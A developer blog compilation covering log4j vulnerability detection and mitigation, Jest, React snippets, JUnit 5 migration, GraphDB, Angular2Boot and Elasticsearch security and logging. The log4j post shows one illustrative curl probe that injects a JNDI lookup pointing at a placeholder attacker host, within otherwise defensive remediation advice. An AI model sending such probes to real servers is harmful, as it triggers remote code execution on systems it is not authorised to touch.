A new follow-on log4j vulnerability has been discovered and fixed in 2.16.0

Source: https://www.linkedin.com/posts/the-apache-software-foundation_apache-opensource-innovation-activity-6876303520321040384-csOP

A new follow-on #log4j vulnerability (CVE-2021-45046, following CVE-2021-44228) has been discovered and fixed in 2.16.0, following on from my first post regarding the initial exploit and the fixed version 2.15.0

TL;DR: You now need to update your #log4j library to 2.16.0

As you would expect, both sides of the community are active. With that, the previously fixed version 2.15.0 and the documented mitigations are still vulnerable in specific non-default configurations, such as using a Thread Context value in the log message Pattern Layout. There is a newer version from Apache, 2.16.0, that you should upgrade to in order to mitigate this. This more recent version completely removes the message lookup feature, which is the critical enabler of this exploit!

Finally, there is tons of information around the recent #log4j exploits, and some are misleading. Perhaps take your cue from an application security company’s blog post like lunasec

Given this is still an evolving situation, I will not post the latest fixes here; instead, please see the official Apache security page for an always up-to-date fix.

Example misleading fixes that would not save you from this log4j exploit 🙂 :
– Updating #Java
– #WAF (Web Application Firewall) filtering
– Simply modifying the log statement format to %m{nolookups}

Log4J zero-day exploit explained and proposed fixes – a Critical Security Vulnerability (CVE-2021-44228)


There is a new zero-day exploit of the famous log4j library, reported and fixed in the latest version, 2.15.0.  In brief, this vulnerability is critical and can give the offender complete control of the server. For more, please see the Apache Log4j security page.  Everyone in the Java-sphere should be aware of it. Actually, no: every engineer and information security person should take action (looking over at my .NET and JavaScript buddies who are giggling at another Java security issue, only to realise by the end of this post that their Elasticsearch and Atlassian apps are affected). This post will attempt to explain the log4j security exploit, help you determine if you are compromised, show how to fix the exploit, and crucially, how to ascertain that you have resolved it.

The best evidence I have seen so far is a "Little Bobby Tables"-style exploit doing the rounds on LinkedIn.
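To make the attack concrete, here is a hedged sketch of the kind of probe attackers were sending: the JNDI lookup string is placed in a header that applications commonly log. The URL and payload below are illustrative only, not taken from any real incident.

```shell
# Illustrative only: the lookup string rides in a commonly logged header
# (attacker.example is a placeholder domain, localhost:8080 an assumed app).
# Single quotes stop the shell itself from expanding ${...}.
curl -H 'User-Agent: ${jndi:ldap://attacker.example/a}' 'http://localhost:8080/'
```

If the server logs the User-Agent header through a vulnerable log4j-core, the `${jndi:...}` lookup is resolved server-side, fetching and executing attacker-controlled code.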

Quick specifics about the log4j-core

  • Log4J: The CVE-2021-44228 vulnerability affects only the log4j-core library.
  • Springboot: The bundled libraries log4j-to-slf4j and log4j-api in spring-boot-starter-logging are not affected, according to Spring. Unless, of course, you have swapped them out to use log4j-core directly, or another logging library transitively brings it into scope.
  • So far, reports seem to suggest applications are only affected when user inputs are logged.
  • PS: Springboot says its v2.5.8 & v2.6.2 releases (due Dec 23, 2021) will contain the fixed Log4J version v2.15.0.

The affected versions are anything from 2.0-beta9 up to and including 2.14.1; beta versions of 2.15.0 are also affected.  The most secure/"permanent" fix is to update your log4j library to 2.15.0 immediately.  Please see Maven Central and the log4j security announcements, or carry on reading.
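Beyond checking your build files, you may also want to check what is actually deployed on a host. A rough sketch (the paths and file-naming assumptions are mine; log4j-core jars conventionally embed the version in the file name):

```shell
# Find log4j-core jars on disk and print the embedded version from the file name.
find / -name 'log4j-core-*.jar' 2>/dev/null \
  | sed -E 's|.*log4j-core-([0-9][^/]*)\.jar|\1|' \
  | sort -u
```

Any version printed that is below 2.15.0 warrants an upgrade. Note this will not catch shaded/uber jars that repackage log4j classes without the original file name.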

Am I affected?

Anyone running Java is affected, on the assumption that something in your application's transitive dependencies brings in log4j even if you are not using it directly.  It is best to assume you have it and act accordingly.  In practice, any Java application that takes user input that may end up in a log is affected, given that log4j is ubiquitous in the Java community!

How to tell which version of the Log4J library I have

You can use dependency managers like Maven or Gradle to print out all your dependencies and their versions to verify which version of Log4J you have.

For example, for Gradle:

# execute, logging out only the log4j dependency lines
./gradlew dependencies | grep "log4j"

Also, note that in popular IDEs like IntelliJ you can right-click on your pom.xml or build.gradle file and choose "generate visual dependency graph" / "effective dependency".
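For Maven projects, an equivalent check to the Gradle command above might be (assuming the Maven wrapper is present; plain `mvn` works the same):

```shell
# Print the resolved dependency tree and filter for log4j entries
./mvnw dependency:tree | grep "log4j"
```

Look for `org.apache.logging.log4j:log4j-core` lines and check the version that appears after the artifact id.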

How to fix the log4J zero-day security exploit

Example fix of the Log4j zero day exploit for Maven

# Override the log4j dependency of a Springboot project by setting the
# version property in pom.xml (assumes spring-boot-starter-parent or
# spring-boot-dependencies manages the version):
<properties>
    <log4j2.version>2.15.0</log4j2.version>
</properties>

# And then verify the override works
./mvnw dependency:list | grep log4j

Example fix of the log4j zero day exploit for Gradle

# Via gradle's platform support, add to build.gradle:
dependencies {
    implementation platform('org.apache.logging.log4j:log4j-bom:2.15.0')
}

# or for those with Springboot simply set the log4j's version
ext['log4j2.version'] = '2.15.0'

# And then verify the override works
./gradlew dependencyInsight --dependency log4j-core

Where upgrading the dependency is not possible

A workaround exists for some versions (releases >= 2.10): set the system property log4j2.formatMsgNoLookups to true in any of the following ways:

# In the JVM options file, add this:
-Dlog4j2.formatMsgNoLookups=true
# or set the environment variable:  LOG4J_FORMAT_MSG_NO_LOOKUPS=true
# or simply run the application with the flag (you may need to quote the value, depending on your shell, i.e. "true")
java -Dlog4j2.formatMsgNoLookups=true -jar myapplication.jar
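One rough way to sanity-check that a running JVM was actually started with the flag is to inspect the process command line. This is a sketch assuming a Unix-like host; `ps` output formats vary slightly between systems:

```shell
# List java processes whose command line carries the mitigation flag
ps -ef | grep -F -- '-Dlog4j2.formatMsgNoLookups=true' | grep -v grep
```

No output means no running process advertises the flag, so the workaround has likely not taken effect. Remember this property alone is not sufficient against the follow-on CVE, as noted at the top of this post.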

Popular applications affected by the log4J critical vulnerability

If you think you are not affected, have a look at this flavour of applications that would be affected:

  • Libraries:
    • Spring Boot
    • Struts
  • Apps
    • Solr
    • ElasticSearch
    • Kafka
    • Logstash
    • Jira
    • Confluence
    • Stash
    • Bamboo
    • Crowd
    • Fisheye
    • Crucible 
  • Server:
    • Steam
    • Apple iCloud
    • Minecraft

Yes, that’s almost any good Java application out there…

As a final reminder, this vulnerability is classed as critical by Apache.  Apache describes a Critical vulnerability as one “which a remote attacker could potentially exploit to get Log4j to execute arbitrary code (either as the user the server is running as or root). These are the sorts of vulnerabilities that could be exploited automatically by worms”.  Here are additional resources for you on the recent Log4J security vulnerability:

How to configure JEST to test a Typescript React or NodeJS

Jest integration with Intellij Idea

This is an opinionated guide illustrating how to configure Jest for testing NodeJS/React projects written in Typescript. It assumes Typescript is already installed. For new projects or projects without Typescript, needless to say, this guide can still be used once the initial project setup is complete. There are plenty of guides out there already for adding Typescript and/or React to your project.

1. Install Jest and friends

yarn add --dev jest ts-jest @types/jest
# or
npm i -D jest ts-jest @types/jest

  1. ts-jest is a TypeScript preprocessor for Jest – it lets you use Jest to test projects written in TypeScript.
  2. @types/jest provides the type definitions, because Jest is written in JavaScript.

2. Configure the preprocessor for Jest

Configure Jest to use ts-jest as the preprocessor, by using ts-jest to auto-create a configuration file named jest.config.js with the Jest preprocessor configs:

npx ts-jest config:init

Initial default generated output:

module.exports = {
    preset: 'ts-jest',
    testEnvironment: 'node',
};

3. A complete opinionated configuration for Jest

My full customisations; the settings are self-descriptive:

module.exports = {
  roots: ["<rootDir>/src"],
  preset: "ts-jest",
  testEnvironment: "node",
  coverageDirectory: "coverage",
  testPathIgnorePatterns: ["/node_modules"],
  verbose: true,
  // collectCoverage: true, <-- Not needed because this is applied (or not) by the scripts in the package.json below
  coverageThreshold: {
    global: {
      branches: 90,
      functions: 95,
      lines: 95,
      statements: 90,
    },
  },
  collectCoverageFrom: ["**/*.{ts,tsx,js,jsx}", "!**/node_modules/**", "!**/vendor/**"],
  coveragePathIgnorePatterns: ["/node_modules"],
  coverageReporters: ["json", "lcov", "text", "clover"],
};

Note: collectCoverage: true must be set, or the flag passed (e.g. jest --coverage), for coverage to be collected, regardless of the other coverage-related settings.

For more on configuring Jest, see the official Configuring Jest documentation.

4. Configure the test scripts in your package.json:

    "scripts": {
        "test": "jest"
    }

Or with advanced/opinionated customisations (self-explanatory naming):

    "scripts": {
        "test": "jest --coverage",
        "test:watch": "jest --coverage --watchAll",
        "test:nocoverage": "jest",
        "test:watch:nocoverage": "jest --watchAll",
        "view:coverage": "serve coverage/lcov-report"
    }

Congratulations if you got this far. This is a one-off set-up; you will reap the benefits in the days to come. Follow on below to test your Jest configuration for testing your Typescript React or NodeJS project.

5. Test it

To verify all is well

  1. Write a simple function, and a test for it – see the Jest examples.
// sum.ts
const sum = (a: number, b: number) => {
  return a * b; // currently red, fixme: to go green (TDD).
};
export default sum;

// sum.test.ts
import sum from "./sum";

describe("test add function", () => {
  test("adds 1 + 2 to equal 3", () => {
    expect(sum(1, 2)).toBe(3); // should fail, fix function under test above.
  });
});

Then run the tests with the following; note the commands come from the scripts configured above:

  1. yarn test to run the tests with coverage
  2. yarn test:watch to continuously run the tests. Highly recommended, particularly when doing TDD (Test-Driven Development).
  3. yarn test:watch:nocoverage to continuously run the tests with no coverage, faster feedback.
  4. yarn view:coverage hosts the reports as a static website, note serve needs to be globally installed: yarn global add serve

Example output when I run yarn test:

yarn test example console output with a failing test.

Go on, fix the test – you know you want to, if you have not already done so. Here is what the output should look like once all your test(s) are passing:

yarn test example console output with a passing test.

Thank you! Enjoy!


React Code Snippet Generators with IntelliJ Idea

I am a big fan of anything that can be automated, especially when it comes to boilerplate plumbing.  Even more so for a Java developer like myself taking up React.  The following snippets have saved me lots of typos and errors, and I suspect they will for you too!

How to generate snippets in IntelliJ Idea

Before we go any further, here is how to generate a code snippet in IntelliJ Idea:

  • Simply type the abbreviation name of the required snippet in the editor in the target file and press ⇥ (Tab).

  • You can further narrow the list of suggestions by typing more characters of your abbreviation.


  • The component name will be taken from the file name "ManageCoursePage.js"
  • For those on the Visual Studio Code IDE, code generation for React can be achieved with the Typescript React Code Snippet Extension

I will pick a few from the above screenshot to illustrate what code is generated.

Creates a React component class with PropTypes and ES6 module system

  1. Type ​`​rccp` in your editor
  2. Then press ⇥ to generate

Generated Snippet

Note: the component name will be taken from the file name "ManageCoursePage.js".

import React, {Component} from 'react';
import PropTypes from 'prop-types';

class ManageCoursePage extends Component {
  render() {
    return (
      <div/>
    );
  }
}

ManageCoursePage.propTypes = {};

export default ManageCoursePage;

Creates a React component class with ES6 module system

  1. Type ​`​rcc` in your editor
  2. Then press ⇥ to generate

Generated Snippet

import React, {Component} from 'react';

class ManageCoursePage extends Component {
  render() {
    return (
      <div/>
    );
  }
}

export default ManageCoursePage;

Creates a React component class connected to redux with dispatch

  1. Type ​`​rrdc` in your editor
  2. Then press ⇥ to generate

Generated Snippet

import React, {Component} from 'react';
import {connect} from 'react-redux';

function mapStateToProps(state) {
  return {};
}

function mapDispatchToProps(dispatch) {
  return {};
}

class ManageCoursePage extends Component {
  render() {
    return (
      <div/>
    );
  }
}

export default connect(
  mapStateToProps,
  mapDispatchToProps,
)(ManageCoursePage);

Creates a React component class with PropTypes and all lifecycle methods and ES6 module system

  1. Type ​`​rcfc` in your editor
  2. Then press ⇥ to generate

Generated Snippet

import React, {Component} from 'react';
import PropTypes from 'prop-types';

class ManageCoursePage extends Component {
  constructor(props) {
    super(props);
  }

  componentWillMount() {
  }

  componentDidMount() {
  }

  componentWillReceiveProps(nextProps) {
  }

  shouldComponentUpdate(nextProps, nextState) {
  }

  componentWillUpdate(nextProps, nextState) {
  }

  componentDidUpdate(prevProps, prevState) {
  }

  componentWillUnmount() {
  }

  render() {
    return (
      <div/>
    );
  }
}

ManageCoursePage.propTypes = {};

export default ManageCoursePage;


I hope you found the above helpful in saving you time and potentially reducing typos/errors and your chances of RSI.  And of course, these are live code snippets and can be managed like other snippets for Java and other languages via IntelliJ Idea's preferences under "Live Templates".


Upgrading from a Spring boot application with JUnit 4 to JUnit 5, Jupiter

I realised this is only doable with Spring 5.

To migrate from JUnit 4 to JUnit 5 you can replace @RunWith(SpringRunner.class) with @ExtendWith(SpringExtension.class).

Unfortunately, spring-boot version 1.5.9-RELEASE is based on Spring 4 and the SpringExtension is only available since Spring 5.

Source: https://stackoverflow.com/questions/48019430/junit5-with-spring-boot-1-5

and  http://www.baeldung.com/junit-5-runwith


Current dependency: spring-boot-starter-test, which pulls in JUnit 4 transitively.

Exclude the transitive JUnit 4 dependency from the Spring Boot test dependency:

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-test</artifactId>
    <scope>test</scope>
    <exclusions>
        <exclusion>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
        </exclusion>
    </exclusions>
</dependency>
This will break all the JUnit imports in your test classes, and your vigilant IDE should already be complaining about these:

import org.junit.Test;
import org.junit.runner.RunWith;

Down also go your annotations:


You should now be able to use your IDE's assist features to add the dependency to your pom, as shown in the following image for IntelliJ.  Or simply copy the dependency from the pom snippet below.



<dependency>
    <groupId>org.junit.jupiter</groupId>
    <artifactId>junit-jupiter-api</artifactId>
    <!-- pick the latest JUnit 5 version from Maven Central -->
    <scope>test</scope>
</dependency>


Make things easy and do a global find/replace:

import org.junit.Test; -> import org.junit.jupiter.api.Test;

import org.junit.runner.RunWith; -> import org.junit.jupiter.api.extension.ExtendWith;

import org.springframework.test.context.junit4.SpringRunner; -> import org.springframework.test.context.junit.jupiter.SpringExtension;

@RunWith(SpringRunner.class) -> @ExtendWith(SpringExtension.class)
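The global find/replace can also be scripted. A sketch using GNU sed over the test sources (the src/test/java path is the Maven convention; adjust for your layout):

```shell
# Rewrite JUnit 4 imports/annotations to their JUnit 5 equivalents in-place.
# Plain BRE patterns: '.' matches any character, close enough for these renames.
grep -rl 'org\.junit' src/test/java | xargs sed -i \
  -e 's/import org.junit.Test;/import org.junit.jupiter.api.Test;/' \
  -e 's/import org.junit.runner.RunWith;/import org.junit.jupiter.api.extension.ExtendWith;/' \
  -e 's/import org.springframework.test.context.junit4.SpringRunner;/import org.springframework.test.context.junit.jupiter.SpringExtension;/' \
  -e 's/@RunWith(SpringRunner.class)/@ExtendWith(SpringExtension.class)/'
```

Commit before running this, then let the compiler and your IDE flag anything the blunt replace missed (e.g. @Before/@BeforeEach).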






Graph DB Connectors – elasticsearch example

Semantic Search gets the power of Full Text Search



  1. An installed instance of GraphDB (currently only the OntoText Enterprise edition has connectors)
  2. An installed instance of Elasticsearch
    1. With port 9300 open and running (this can be configured in */config/elasticsearch.yml or through your Puppet/Chef)
    2. If you are running this on Vagrant, ensure all ports are forwarded to your host [9200, 9300, 12055, etc.]


Prepare GraphDB

  1. Set up the GraphDB location

Set up the repository and switch it on as the default

GraphDB Locations And Repo

Create Elasticsearch Connector

  1. Go to the SPARQL tab
  2. Insert a query like the one below and hit Run


PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
PREFIX inst: <http://www.ontotext.com/connectors/elasticsearch/instance#>

INSERT DATA {inst:my_index :createConnector '''
{
  "elasticsearchCluster": "vagrant",
  "elasticsearchNode": "localhost:9300",
  "types": ["http://www.ontotext.com/example/wine#Wine"],
  "fields": [
    {"fieldName": "grape",
      "propertyChain": ["http://www.ontotext.com/example/wine#madeFromGrape",
                        "http://www.w3.org/2000/01/rdf-schema#label"]},
    {"fieldName": "sugar",
      "propertyChain": ["http://www.ontotext.com/example/wine#hasSugar"],
      "orderBy": true},
    {"fieldName": "year",
      "propertyChain": ["http://www.ontotext.com/example/wine#hasYear"]}
  ]
}
''' .
}

3.  Go over to Elasticsearch and confirm that you have a newly created index [my_index]; this will be empty for now

4.  Example debugging to do: check for the listed connectors and their status:

PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>

SELECT ?cntUri ?cntStr {
  ?cntUri :listConnectors ?cntStr .
}

PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>

SELECT ?cntUri ?cntStatus {
  ?cntUri :connectorStatus ?cntStatus .
}


Insert Data in GraphDB


  1. The connector listens for any data changes and inserts/updates/syncs the accompanying Elasticsearch copy.


@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
@prefix : <http://www.ontotext.com/example/wine#> .

:RedWine rdfs:subClassOf :Wine .
:WhiteWine rdfs:subClassOf :Wine .
:RoseWine rdfs:subClassOf :Wine .

:Merlo
    rdf:type :Grape ;
    rdfs:label "Merlo" .

:CabernetSauvignon
    rdf:type :Grape ;
    rdfs:label "Cabernet Sauvignon" .

:CabernetFranc
    rdf:type :Grape ;
    rdfs:label "Cabernet Franc" .

:PinotNoir
    rdf:type :Grape ;
    rdfs:label "Pinot Noir" .

:Chardonnay
    rdf:type :Grape ;
    rdfs:label "Chardonnay" .

:Yoyowine
    rdf:type :RedWine ;
    :madeFromGrape :CabernetSauvignon ;
    :hasSugar "dry" ;
    :hasYear "2013"^^xsd:integer .

:Franvino
    rdf:type :RedWine ;
    :madeFromGrape :Merlo ;
    :madeFromGrape :CabernetFranc ;
    :hasSugar "dry" ;
    :hasYear "2012"^^xsd:integer .

:Noirette
    rdf:type :RedWine ;
    :madeFromGrape :PinotNoir ;
    :hasSugar "medium" ;
    :hasYear "2012"^^xsd:integer .

:Blanquito
    rdf:type :WhiteWine ;
    :madeFromGrape :Chardonnay ;
    :hasSugar "dry" ;
    :hasYear "2012"^^xsd:integer .

:Rozova
    rdf:type :RoseWine ;
    :madeFromGrape :PinotNoir ;
    :hasSugar "medium" ;
    :hasYear "2013"^^xsd:integer .



TypeScript is great but I just want to write my Angular2 app in Java8

angular2boot intellij Idea


It is really hard to look at any alternative to TypeScript for Angular2 development. Not only is it easy to learn, it is also far less error-prone than developing in JS, as you get static type checking for classes, interfaces and so on.

Sometimes you just want to write your Angular2 app in Java 8 (and hopefully Java 9 soon).  This is a particular no-brainer if it is only a small application, where splitting the app into multiple components/tiers (web client, service & backend REST API) is not really worth the overhead.

I just want to write my Angular2 app in Java8

Enter Angular2Boot

  • Write angular2 apps in Java 8
  • A framework built on top of Angular 2, GWT and Spring Boot
    • GWT is used to compile the Java to JS
    • You are free to mix GWT and Angular, but why would you, other than to deal with legacy code.


  1. TypeScript is good, but here you get an even stronger-typed OO language in Java
  2. Numerous tried and tested tools and IDEs around for Java.
  3. And for when you need one single jar, nothing is better than one uber Springboot jar! Not to mention the simplicity and ease of Springboot, especially when building POCs
  4. And let's face it, Java is the language of choice for building robust applications


Give it a try (5 minutes)


Create Project

Generate Angular and Gwt App from archetype template

mvn archetype:generate \
  -DarchetypeGroupId=fr.lteconsulting \
  -DarchetypeArtifactId=angular2-gwt.archetype

  • This will then scan for and download dependencies etc. You'll then be prompted to feed in a few more details:
# Define value for property 'groupId': com.mosesmansaray.play
# Define value for property 'artifactId': angular-gwt-in-java8-example
# Define value for property 'version' 1.0-SNAPSHOT: :
# Define value for property 'package' com.mosesmansaray.play: :
  • Then confirm the properties configuration to complete


To install/produce an executable fat jar:

mvn clean install

  • The above will complete the download of further dependencies needed to compile the application.
  • It should then be ready in your application's target folder e.g.



To run the fat jar:

java -jar target/angular-gwt-in-java8-example-1.0-SNAPSHOT.jar


Developing/Live reload

  • Backend: mvn spring-boot:run
  • Frontend: mvn gwt:run-codeserver


  1. Documentation and more at lteconsulting.fr
  2. Library source code
  3. Or check out Arnaud Tournier's talk at GWTcon 2016 below:
    1. YouTube quick run-through
    2. Speaker Deck slides
  4. Angular2boot Tour of Heroes Tutorial
  5. Demos on github
  6. The angular2-gwt.archetype

Elasticsearch Ransomware

Elasticsearch logo


  1. Use X-Pack if you can,
  2. Do not expose your cluster to the internet,
  3. Do not use default configurations e.g. ports,
  4. Disable http if possible,
  5. If it must be internet facing: run behind a firewall, reverse proxy – Nginx (see example config), VPN etc,
  6. Disable Scripts,
  7. Regular back-ups of your data with Curator, if you are not doing so already.

Well, we all saw that coming, didn't we?  Once MongoDB started being ransomed by criminals, other NoSQL-type technologies were surely next in line. Now Elasticsearch ransomware; no surprise either that most Elasticsearch clusters are open to the internet.  It goes without saying that even the secured ones are mostly behind weak/guessable passwords, on default ports, with unneeded HTTP enabled.

The attackers are currently emptying out clusters, with a note left behind demanding payment:

 “Send 0.2 BTC (bitcoin)to this wallet xxxxxxxxxxxxxx234235xxxxxx343xxxx  if you want recover your database! Send to this email your service IP after sending the bitcoins xxxxxxx@xxxxxxx.org”

Rest assured, if you are using Elastic Cloud you will be protected by its default Shield/X-Pack protection.  To protect your self-hosted cluster, the team at Elastic have posted a guide here.  Such a guide really should not be news to any Elasticsearch admin! If it is, then action is nigh!

There is also a detailed step-by-step guide on all things securing your Elasticsearch cluster: "Don't be ransacked: Securing your Elasticsearch cluster properly" by Itamar Syn-Hershko.

So far it has been mostly Amazon-exposed services.  But the same Elasticsearch ransomware techniques against an insecure (wrongly configured) Elasticsearch instance can be applied to any other hosted or self-hosted Elasticsearch service.

Cleaning Elasticsearch Data being indexed

Sometimes we just don't have control over the source of the data coming into our Elasticsearch indices.  In such cases, clean the data and remove unwanted content such as HTML tags before it is put into your Elasticsearch index.  This prevents unwanted and unpredictable behaviour.

For instance, given the text below:

<a href=\"http://somedomain.com>\">website</a>


If the above is indexed without cleaning the HTML, a search for "somedomain" will match documents containing the above link.  It might be what you want, but in most cases users do not.  To prevent this, you can use a custom analyser to clean your data.
Below is an example solution, with some cool techniques to debug and analyse your analyser, such as querying the actual data that is in your index. Note: this is not the Elasticsearch document _source field, which will always hold the true, 100% raw data that hits Elasticsearch, unmodified.

Cleaning Elasticsearch Data


Create a new index with the required html_strip mapping filter configured

PUT /html_poc_v3
{
  "settings": {
    "analysis": {
      "analyzer": {
        "my_html_analyzer": {
          "type": "custom",
          "tokenizer": "standard",
          "char_filter": ["html_strip"]
        }
      }
    }
  },
  "mappings": {
    "html_poc_type": {
      "properties": {
        "body": {
          "type": "string",
          "analyzer": "my_html_analyzer"
        },
        "description": {
          "type": "string",
          "analyzer": "standard"
        },
        "title": {
          "type": "string",
          "index_analyzer": "my_html_analyzer"
        },
        "urlTitle": {
          "type": "string"
        }
      }
    }
  }
}


Post Some Data

POST /html_poc_v3/html_poc_type/02
{
  "description": "Description <p>Some d&eacute;j&agrave; vu <a href=\"http://somedomain.com>\">website</a>",
  "title": "Title <p>Some d&eacute;j&agrave; vu <a href=\"http://somedomain.com>\">website</a>",
  "body": "Body <p>Some d&eacute;j&agrave; vu <a href=\"http://somedomain.com>\">website</a>"
}

Now retrieve indexed data

This will by-pass the _source field and fetch the actual indexed data/tokens

GET /html_poc_v3/html_poc_type/_search?pretty=true
{
  "query": {
    "match_all": {}
  },
  "script_fields": {
    "title": {
      "script": "doc[field].values",
      "params": {
        "field": "title"
      }
    },
    "description": {
      "script": "doc[field].values",
      "params": {
        "field": "description"
      }
    },
    "body": {
      "script": "doc[field].values",
      "params": {
        "field": "body"
      }
    }
  }
}
 Example Response

Note the difference between title, description and body:

{
  "took": 2,
  "timed_out": false,
  "_shards": {
    "total": 5,
    "successful": 5,
    "failed": 0
  },
  "hits": {
    "total": 1,
    "max_score": 1,
    "hits": [
      {
        "_index": "html_poc_v3",
        "_type": "html_poc_type",
        "_id": "02",
        "_score": 1,
        "fields": {
          "title": [ ... ],
          "body": [ ... ],
          "description": [ ... ]
        }
      }
    ]
  }
}
Further Cleaning Elasticsearch Data References:

Use this tool to test your analyser: elasticsearch-inquisitor


Missing logs in Elasticsearch logs at midnight

Case: of the Missing logs

I was debugging a curious case of my Elasticsearch instance on my Vagrant dev box going into RED state every night at 00:00:00.  Consistently, as far back as I can remember.

Right, the obvious thing to do is look at the logs, right? Except, for this set of rotated logs, there are no lines between 23:40 and 00:00:05.  Not in the current un-rotated log, nor in the previous set.

At First Pass:

  1. Elasticsearch rotates its own logs.  Could this process be causing the missing Elasticsearch log lines?
  2. Marvel creates new daily indices at 00:00:00.  Could this be causing the missing Elasticsearch log lines?

What was really causing the missing logs

By default, Elasticsearch uses log4j.  However, instead of the standard log4j.properties file you get with log4j, Elasticsearch uses a configuration translated into YAML format, excluding all of the log4j prefix giveaways.  A closer look at the configuration led to a curious investigation of the type of rolling appender: DailyRollingFile.  That led to this revelation:

DailyRollingFileAppender extends FileAppender so that the underlying file is rolled over at a user chosen frequency. DailyRollingFileAppender has been observed to exhibit synchronization issues and data loss. The log4j extras companion includes alternatives which should be considered for new deployments and which are discussed in the documentation for org.apache.log4j.rolling.RollingFileAppender.

Source :  Apache’s DailyRollingFileAppender Documentation

Missing Elastic logs Root Cause:

The sync issue with the DailyRollingFileAppender must be the cause of the missing Elasticsearch log lines around midnight.

Missing Elastic logs fix:

Use one of the log4j alternatives to DailyRollingFileAppender.  In this case a RollingFileAppender, changing my rolling strategy to roll logs when they reach a certain file size: replace DailyRollingFileAppender with RollingFileAppender and remove the datePattern, which was for the DailyRollingFileAppender.


appender:
  file:
    type: rollingFile
    file: ${path.logs}/${cluster.name}.log
    maxFileSize: 10000000
    maxBackupIndex: 10
    layout:
        type: pattern
        conversionPattern: "[%d{ISO8601}][%-5p][%-25c] %m%n"

Note: YAML is particular about tabs!
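Since a stray tab silently breaks the YAML, a quick pre-flight check is worth running before restarting Elasticsearch. A sketch, assuming the config file is named logging.yml:

```shell
# YAML forbids literal tabs for indentation; flag any line containing one.
if grep -qn "$(printf '\t')" logging.yml; then
  echo "logging.yml contains tab characters - fix the indentation"
fi
```

`grep -n` also prints the offending line numbers, which makes the fix quick.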

Happy Ending

Marvel turned out to be the cause of my Elasticsearch cluster going into RED state at midnight, on new Marvel index creation.  Which makes sense, as there will be a few milliseconds to seconds during which this new index will have been created with shards, replicas, etc. still missing.